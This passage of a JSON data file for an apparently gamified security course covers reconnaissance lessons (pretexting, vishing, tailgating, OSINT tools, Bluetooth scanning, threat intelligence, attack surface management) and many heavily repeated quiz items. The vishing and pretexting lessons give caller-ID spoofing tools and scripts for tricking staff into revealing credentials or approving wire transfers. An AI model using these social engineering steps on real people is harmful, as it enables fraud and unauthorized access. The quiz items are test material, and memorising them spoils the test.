speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-social-eng-pretext","cat":"Reconnaissance","title":"Social Engineering Pretexting","diff":3,"xp":200,"intro":"Build convincing pretexts for social engineering attacks.","sections":[{"type":"text","content":"A pretext is a fabricated scenario: IT support calling about a migration, a vendor verifying an order, HR conducting a survey. The pretext must match the target's reality."},{"type":"code","lang":"bash","content":"# Pretext research:\n# 1. Find target's vendors (LinkedIn, job posts, press releases)\n# 2. Learn internal terminology (glassdoor, public docs)\n# 3. Identify authority figures (LinkedIn org chart)\n# 4. Create backstory matching their processes\n# 5. Prepare for common questions/pushback"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"A good pretext is...","opts":["Generic and vague","Specific to the target's reality and verifiable","Overly technical","Unrelated to the target"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-phone-vishing","cat":"Reconnaissance","title":"Vishing (Voice Phishing)","diff":3,"xp":200,"intro":"Social engineering attacks over the phone.","sections":[{"type":"text","content":"Vishing combines pretexting with phone calls. Spoof caller ID, use urgency and authority, and guide the target through revealing credentials or granting access."},{"type":"code","lang":"bash","content":"# Caller ID spoofing tools:\n# - SIPVicious (VoIP)\n# - Spoofcard\n# Vishing frameworks:\n# - SET (Social Engineer Toolkit) has phone vectors\n# Common pretexts:\n# - IT support: 'Your account was compromised'\n# - Help desk: 'I need to verify your identity'\n# - Executive: 'Urgent wire transfer needed'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Vishing is effective because...","opts":["Email filters block it","Phone calls create urgency and authority that's hard to resist","It's automated","It uses encryption"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-physical-tailgating","cat":"Reconnaissance","title":"Physical Security: Tailgating","diff":3,"xp":200,"intro":"Follow an authorized person through a secure door.","sections":[{"type":"text","content":"Tailgating exploits politeness: carry boxes so someone holds the door, wear a vendor uniform, or simply walk in confidently behind someone during a busy time."},{"type":"code","lang":"bash","content":"# Physical recon checklist:\n# - Observe entry/exit patterns and peak times\n# - Note badge types and security cameras\n# - Identify delivery/smoking area entrances\n# - Wear appropriate attire for the pretext\n# - Carry a prop (boxes, clipboard, laptop bag)\n# - Have a cover story ready"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Tailgating exploits...","opts":["Technical vulnerabilities","Human politeness and the habit of holding doors","Network protocols","Software bugs"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-open-source-intel-tools","cat":"Reconnaissance","title":"OSINT Tool Ecosystem","diff":1,"xp":75,"intro":"Overview of the major OSINT tools and their purposes.","sections":[{"type":"text","content":"Key OSINT tools: Maltego (link analysis), SpiderFoot (automated), theHarvester (email/name), Recon-ng (modular), Shodan (devices), FOCA (metadata)."},{"type":"code","lang":"bash","content":"# Tool selection guide:\n# Broad automated scan: spiderfoot -s target.com\n# Email harvesting: theHarvester -d target.com -b all\n# Link analysis: maltego (GUI)\n# Modular/scriptable: recon-ng\n# Internet devices: shodan search 'org:target'\n# Document metadata: FOCA, metagoofil"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Maltego specializes in...","opts":["Port scanning","Visual link analysis between entities","Email harvesting","Vulnerability scanning"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-bluetooth-recon","cat":"Reconnaissance","title":"Bluetooth Reconnaissance","diff":3,"xp":200,"intro":"Discover and probe Bluetooth devices in range.","sections":[{"type":"text","content":"Bluetooth scanning reveals device names, MAC addresses, services, and sometimes device types. Classic BT and BLE have different discovery methods."},{"type":"code","lang":"bash","content":"hcitool scan  # Classic Bluetooth\nhcitool lescan  # BLE\nsdptool browse XX:XX:XX:XX:XX:XX  # Service discovery\nbtlejack -d XX:XX:XX:XX:XX:XX  # BLE sniffing"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Bluetooth service discovery reveals...","opts":["Network topology","Available services on the device (file transfer, audio, serial)","Passwords","IP addresses"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-threat-intel-gathering","cat":"Reconnaissance","title":"Threat Intelligence Gathering","diff":4,"xp":250,"intro":"Collect and analyze threat intelligence for target assessment.","sections":[{"type":"text","content":"Gather threat intel from: MITRE ATT&CK (techniques), AlienVault OTX (IOCs), VirusTotal (file/URL analysis), and industry ISACs (sector-specific threats)."},{"type":"code","lang":"bash","content":"# MITRE ATT&CK: research techniques used by APTs targeting the sector\n# AlienVault OTX: search for IOCs related to the target\ncurl 'https://otx.alienvault.com/api/v1/indicators/domain/target.com/general' -H 'X-OTX-API-KEY:KEY'\n# VirusTotal: check reputation\ncurl 'https://www.virustotal.com/api/v3/domains/target.com' -H 'x-apikey:KEY'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Threat intelligence gathering differs from recon by...","opts":["Being faster","Focusing on known threats and attacker TTPs rather than target surface","Using different tools","Being passive only"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-attack-surface-mgmt","cat":"Reconnaissance","title":"Attack Surface Management","diff":4,"xp":250,"intro":"Continuously discover and monitor the external attack surface.","sections":[{"type":"text","content":"ASM goes beyond one-time recon: continuously discover new assets, monitor for changes, detect shadow IT, and alert on newly exposed services."},{"type":"code","lang":"bash","content":"# ASM workflow:\n# 1. Initial discovery (amass, subfinder, cloud_enum)\n# 2. Baseline the attack surface\n# 3. Schedule regular scans (weekly)\n# 4. Diff results against baseline\n# 5. Alert on: new subdomains, new open ports, new cloud assets\n# 6. Integrate with vulnerability scanning\n# Tools: ProjectDiscovery suite, Assetnote, Censys ASM"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"ASM differs from one-time recon by...","opts":["Being faster","Continuously monitoring for changes over time","Using different tools","Being active only"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-osint-social-graph","cat":"Reconnaissance","title":"Social Graph Analysis","diff":4,"xp":250,"intro":"Map relationships between people and organizations for targeted attacks.","sections":[{"type":"text","content":"Social graph analysis maps connections: who knows whom, who reports to whom, who shares information, and who has access to what. This reveals the best targets for social engineering."},{"type":"code","lang":"bash","content":"# Build social graph from:\n# 1. LinkedIn connections and endorsements\n# 2. GitHub collaborators and org membership\n# 3. Twitter/X follows and interactions\n# 4. Conference speaker lists and co-authors\n# 5. Email headers (CC lists)\n# Tools: Maltego, Gephi, NodeXL"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Social graph analysis 